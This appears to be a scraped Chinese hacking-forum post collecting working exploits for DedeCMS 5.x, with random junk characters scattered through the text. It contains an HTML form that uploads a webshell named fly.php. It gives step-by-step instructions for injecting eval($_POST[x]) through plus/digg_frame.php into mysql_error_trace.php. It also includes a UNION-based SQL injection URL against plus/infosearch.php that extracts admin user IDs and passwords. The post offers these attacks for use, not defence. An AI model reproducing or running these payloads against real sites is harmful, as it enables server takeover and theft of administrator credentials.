<input type='hidden' name='f' value='form1.enclosure' />
5 T& |+ v8 }" V5 b( v<input type='hidden' name='job' value='upload' />0 z3 N1 k+ h$ [( n5 T" ]0 v
<input type='hidden' name='newname' value='fly.php' />
6 S4 `9 A- Z$ I* A7 jSelect U Shell <input type='file' name='uploadfile' size='25' />
2 n& K' k  D" K& P" s; C. t+ ~<input type='submit' name='sb1' value='确定' />" n7 H1 N& k) z" p* `
</form>
+ L5 L8 l& K; r  v: T4 ~<br />It's just a exp for the bug of Dedecms V55...<br />
% q* F! ]/ e# C" ?2 w; u& X% ZNeed register_globals = on...<br />) i! O% p) e3 `% X9 H1 ~. V. p) }
Fun the game,get a webshell at /data/cache/fly.php...<br />
, e: P0 Q& C( k) p/ x3 x</body>2 E. n* B4 d+ v
</html>; Z; |9 q9 Y9 i

/ h8 S# }% w( P  r8 x3 ^
& ?" `# c0 h3 j/ B  Q3 Y* e- m: B% O/ g' V

' X. F5 D, |; x: v' J/ h0 H& S0 i. C' E! g  @: K$ c

( v! B7 A7 A* B- [$ b5 |" T7 J
& b2 y8 ~6 G; l+ F2 q* [; Z
3 O6 c: a' f0 {6 @
7 A; a2 _/ n) p  \+ I' a  s5 R- s  E6 l1 T
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞1 [* N& {6 |  o7 |
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
# T+ F# O3 K3 h/ F  @9 e) Z% {1. 访问网址：8 _  b: G4 o) E8 U1 ~3 H; a
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>% t2 E1 i3 d0 G# u; J( T
可看见错误信息
# l  }* _' E# ]  Y4 L; Z
0 N5 B+ |7 |1 x
0 @, T9 W+ C0 Z3 ~* X: Z8 I2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。9 y1 r4 Y% K0 M
int(3) Error: Illegal double '1024e1024' value found during parsing& w1 ~0 e+ [5 C0 @
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
" [0 T$ m! }) d; T6 b: R2 d' K2 Y& e$ O# G, ?7 I" B

4 {0 B3 x  g# C. p2 d3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是
3 p$ }; W( ~: L4 O  i3 t
5 t/ \2 Q& _+ f! m' u$ D/ G
, Y8 @8 `3 W' o( C3 a<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>' b( i2 g5 r3 L; N, B5 u
, [9 T. d4 [+ ~+ k& ]1 H7 S% `
; a: ~3 ]) x8 a5 D: M
按确定后的看到第2步骤的信息表示文件木马上传成功.$ k% \4 c/ |2 m

- [' v" l) o+ B# w7 P3 o/ K* h8 K# c' B

9 ]+ g7 y. |5 z+ k! q$ G/ l; y. c% l8 \/ r/ {
5 f, Y0 c1 d4 d  z$ \& j4 ?8 \4 ]
7 R# F8 |8 m1 }+ B3 B
3 H  |! i8 w: D! j

8 A) x+ X5 u0 l, }+ G' i+ W# M8 n0 q
+ ^1 K. B- D+ o4 R0 f4 F5 Q# }$ w
: V8 f# T; l) _

4 D3 d( L" ^0 R织梦(DedeCms)plus/infosearch.php 文件注入漏洞
9 q7 J: T  H. a/ C  y6 b- _http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)